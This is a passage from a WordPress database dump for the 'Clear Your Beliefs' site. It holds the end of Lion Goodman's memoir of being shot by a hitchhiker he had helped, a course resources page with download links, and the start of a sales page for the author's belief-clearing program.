were a little boy, disappointed in himself for failing.\r\n\r\nMy time sense was altered. I floated in a zone of ultra-reality, with no idea of how much time had passed since the first bullet. After what felt like many minutes, Ray came up to me, still in my crouched, locked-in position, and said, “Okay, man, I’m going to take you to a hospital. But I don’t want you to move, so I’m going to put some stuff on you so you can’t move, okay?”\r\n\r\nNow he was asking my permission. “Okay,” I said softly. He began taking boxes filled with samples and stacked them around me. “Are you okay?” he asked.\r\n\r\n“Yeah, I’m okay. A little uncomfortable, but it’s all right.”\r\n\r\n“All right, man. I’m going to take you to a hospital I know of. Now don’t move. And don’t die on me, okay?”\r\n\r\n“Okay,” I promised. I knew I wouldn’t die. This light, this power inside me was so strong, so certain. Each breath felt like my first, not my last. I was going to survive. I knew it. Ray lowered the pop-top of the van, secured the straps, and started up the engine. I could feel the van backing up on the dirt road, finding the pavement and moving forward to my freedom.\r\n\r\nHe drove on and on – to where, I had no idea. Were we bound for a hospital, as he said, or toward some horrible fate? If he was capable of killing me with a gun, he was capable of lying, or worse. How did he know where to go? We were in Claremont. Los Angeles was more than an hour away. As I sat alone in the dark van, I re-played the scenes and analyzed the past three days, trying to understand what had happened, and why.\r\n\r\nAfter an hour or so of deep contemplation and questioning everything in my life, I felt the van slow, pull over and stop. The engine was turned off. Silence filled the space. I waited. It was still dark outside. We had not pulled into a driveway. There were no lights. This was not a hospital.\r\n\r\nRay walked back toward me with his gun in his hand. He pulled away one of the boxes and sat down on the platform bed, turning toward me. He looked distraught. His head hung down. His words cut deep through my cloud of hope. “I have to kill you, man,” he said calmly.\r\n\r\n“Why?” I asked quietly.\r\n\r\n“If I take you to the hospital, they’ll put me back in jail. I can’t go back to jail, man. I can’t.”\r\n\r\n“They wouldn’t put you in jail if you take me to the hospital,” I said slowly, still feigning injury, passivity. I knew that I might find an opening, a moment when I could surprise him, overpower him, take away his gun. As long as he didn’t know I was okay, I had an advantage.\r\n\r\n“Oh yes they would, man. They’d know I shot you, and they’d lock me up.”\r\n\r\n“We don’t have to tell them. I won’t tell them.”\r\n\r\n“I can’t trust you, man. I wish I could, but I can’t. I can’t go back to jail, that’s all. I have to kill you.” He seemed forlorn. This was not where he wanted to be. He wasn’t making any moves. His gun hung limply from his hand, pointed down toward the floor. The boxes were still stacked around me. I couldn’t judge how much strength I had, whether it would be enough to push out and wrestle him down. He was small but strong. Was he still full of adrenaline? That would make him even stronger. My strength lay in words, in verbal swordplay. If I could keep him talking, he might not take stronger action.\r\n\r\n“Maybe I could go into the hospital alone, Ray. You wouldn’t even have to be there. You could get away.”\r\n\r\n“No, man,” he said, shaking his head. “As soon as you told them, they’d come find me. They’d track me down.”\r\n\r\nI was silent. That didn’t work, I noted. What could I do to escape this danger? The only answer I could find was to stay present in the moment. Keep breathing. Be awake to everything.\r\n\r\nHe said, “Why aren’t you dead, man? I shot you four times in the head. How come you’re still alive and talking? You should be dead! I know I didn’t miss.” He looked again at my head, taking it in one hand and turning it to the left and right. “Does it hurt?” he asked. He seemed genuinely concerned.\r\n\r\n“Yeah, it hurts,” I lied. “But I think I’m going to be okay.”\r\n\r\n“Well, I don’t know what to do. I can’t take you to the hospital. I can’t just let you go, because you’ll go to the police. Why were you so damn nice to me, man? No one’s ever been that nice to me before. It made it harder to kill you. You kept buying me stuff, and giving me stuff. I just couldn’t decide when to do it.”\r\n\r\nNot if, but when.\r\n\r\n“What would you do with all this stuff if you had it, Ray?” I asked.\r\n\r\n“I could go home and be somebody, I could do stuff. I’d have enough money to buy my way out of there, man.” Ray began to talk, weaving his sad tale. I listened deeply. He talked about his home in East Los Angeles, the poverty around him, his anger, the schoolteachers who made him feel stupid, his father who drank too much and beat him, and being a tough guy on the streets. He talked about joining the army, how that was supposed to make it work, but he couldn’t stand being told what to do all the time, so he went AWOL.\r\n\r\nHe talked about dealing drugs, and drug deals going bad, and how he ripped off his dealer buddies. That’s why he had to leave L.A., because they were looking for him. He talked about stealing his father’s gun and money before he left. Then his car broke down, and he realized there was no place to hide.\r\n\r\nHe decided to turn back. He could do one more rip-off and get rich. He just needed one hit, one sucker. If his target was rich enough, he could pay off the dealers and start over. So he decided to kill whoever stopped. Whoever came by to help him.\r\n\r\nI volunteered.\r\n\r\nThe night was turning to morning, the sky shifting slowly from dark indigo to deep blue. The sound of chirping birds was the most beautiful sound I had ever heard. I was grateful to be alive.\r\n\r\n“I’m pretty stiff and sore, Ray.  I’d feel better if I could get up and stretch.” I was still in the same position I had been locked in for six hours. Dried blood was plastered to my hair and face, my shins hurt from being pushed against the edge of a cupboard door, and my lower back was throbbing with a deep ache. My head felt like I had been hit hard with a baseball bat.\r\n\r\n“Okay, man.  I’m going to let you up – but don’t do anything stupid, okay?”\r\n\r\n“Okay, Ray. You just tell me what to do and I’ll do it.”\r\n\r\nRemind him that he is in control. Don’t let him feel out of control. Look for an opening.\r\n\r\nHe moved the boxes from around me, stepped back with the gun in his hand, and opened the door. I crawled slowly out of the van, stretching upright for the first time. How beautiful the world was to my new eyes. Everything shone as if made of sparkling crystal.\r\n\r\nWe had stopped on a residential street near an embankment with a small pond at the bottom. He gestured down the dirt trail that led to the water. As I walked down the steep incline I thought, “Is this death again, tapping on my shoulder? Will he shoot me in the back and push me into the water?”\r\n\r\nI felt weak and vulnerable, yet simultaneously immortal and impervious to his bullets. I walked erect and unafraid. He followed me to the water’s edge and stood by as I squatted down and rinsed my bloodied hands and face, splashing cool, fresh water on myself. I stood up slowly and faced Ray. He looked at me curiously.\r\n\r\n“What would you do if I handed you this gun right now?” he asked, holding the gun out to me.\r\n\r\nMy answer was my first thought: “I’d throw it out there, into the water.”\r\n\r\n“Aren’t you mad at me, man?” he asked. He seemed incredulous.\r\n\r\n“No, why should I be mad?”\r\n\r\n“I shot you, man!  You ought to be angry! I’d be fucking furious! You wouldn’t want to kill me if I gave you this gun?”\r\n\r\n“No, Ray, I wouldn’t. Why should I?  I have my life, and you have yours.”\r\n\r\n“I don’t understand you, man. You are really weird – really different than anyone I’ve ever met before. And I don’t know why you didn’t die when I shot you.”\r\n\r\nSilence. Better left unanswered.\r\n\r\nAs we stood at the water’s edge, I realized that Ray had undergone as profound a transformation as I had. We were both different people than we had been the day before.\r\n\r\n“What should we do now, Ray?”\r\n\r\n“I don’t know, man. I can’t take you to the hospital. I can’t let you go. I don’t know what to do.”\r\n\r\nWe continued to talk, seeking a solution to his dilemma. We explored the possibilities – what could we agree to? I made suggestions, he told me why they wouldn’t work. I made other suggestions. He listened, considered, rejected, and relented. We sought a compromise.\r\n\r\nUltimately, we found a bargain we could agree to: I would let him go, and he would let me go. I promised not to turn him in or report him to the police, but under one condition – he had to promise that he would never do anything like this again.\r\n\r\nHe promised. What choice did he have?\r\n\r\nAs the sun rose over the hills, we climbed back into the van. I sat in the passenger seat and he drove to a place that was familiar to him. He parked, and turned off the engine. I gave him all the cash I had – about $200 – and a couple of watches I thought he could pawn. We got out of the van and walked together across the street to a bus stop.\r\n\r\nThe sun was shining. It was early in the day but already warm. He had his army jacket and sleeping bag under one arm, his duffel bag slung over his shoulder. Somewhere in the bundle there was a black gun.\r\n\r\nWe shook hands. I smiled at him, and he continued to look confused. Then I said goodbye and walked away.\r\n\r\nIn the emergency room of L.A. County Hospital, a doctor scraped away small bits of metal, skin and hair, and sewed stitches into my scalp. He asked me how it had happened, and I told him, “I was shot, four times.”\r\n\r\n“You’re a lucky man,” he said. “The two bullets that hit you both glanced off your skull. You have to report this to the police, you know.”\r\n\r\n“Yes, I know,” I said.\r\n\r\nHe called me lucky, but I knew it was more than luck – I felt blessed. I didn’t go to the police. I had made a promise and had received a promise in return.\r\n\r\n<strong>I kept my promise. </strong>\r\n\r\n<strong>And I believe that Ray kept his.</strong>\r\n<p style="text-align: center;">. . .</p>\r\n&nbsp;\r\n\r\n<strong>About the Author</strong>\r\n\r\nLion Goodman is an author, teacher, coach, and healer.  He shares his wisdom through his <strong><em>Clear Your Beliefs</em></strong> program, and teaches his methodology to coaches and therapists around the world.  He is the author of <em>Clear Your Beliefs,</em> and <em>Creating On Purpose</em> (with Anodea Judith).  He provides transformative coaching and healing to people worldwide, helping them clear what''s in the way so they can fulfill their dreams and manifest their life purpose. He is passionate about developing leadership and resiliency in businesspeople and in youth.\r\n\r\nThis story was first published in the book, <em>I Thought My Father Was God… and Other True Tales from NPR’s National Story Project</em>, edited by Paul Auster (Henry Holt, October 2001). A short feature film, <strong><em>“The Kindness of Strangers,”</em> </strong>was produced based on this story. Directed by Claudia Myers, it won “Best Film” at the Rosebud Film Festival. The 20-minute film can be viewed here: <a href="www.EverydayAwakening.com/video.html">www.EverydayAwakening.com/video.html</a>.\r\n\r\nI would enjoy hearing your feedback. Write to me at liongoodman@gmail.com.\r\n\r\n© 2008 by Lion Goodman. All rights reserved.', 'My Near Death Story', '', 'inherit', 'closed', 'open', '', '2071-revision-v1', '', '', '2015-01-02 15:26:11', '2015-01-02 20:26:11', '', 2071, 'http://clearyourbeliefs.com/2071-revision-v1', 0, 'revision', '', 0),
(1106, 4194, '2014-06-25 18:25:17', '2014-06-25 23:25:17', '', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', 'clear-your-beliefs-5', '', '', '2014-06-25 18:25:17', '2014-06-25 23:25:17', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Clear-Your-Beliefs.png', 0, 'attachment', 'image/png', 0),
(1115, 4194, '2014-06-26 09:44:34', '2014-06-26 14:44:34', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256" style="box-shadow: none;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-26 09:44:34', '2014-06-26 14:44:34', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1116, 4194, '2014-06-26 09:45:06', '2014-06-26 14:45:06', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256" style="box-shadow: none!important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-26 09:45:06', '2014-06-26 14:45:06', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1117, 4194, '2014-06-26 16:44:08', '2014-06-26 21:44:08', '<div style="width: 125%; margin-left: -80px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a 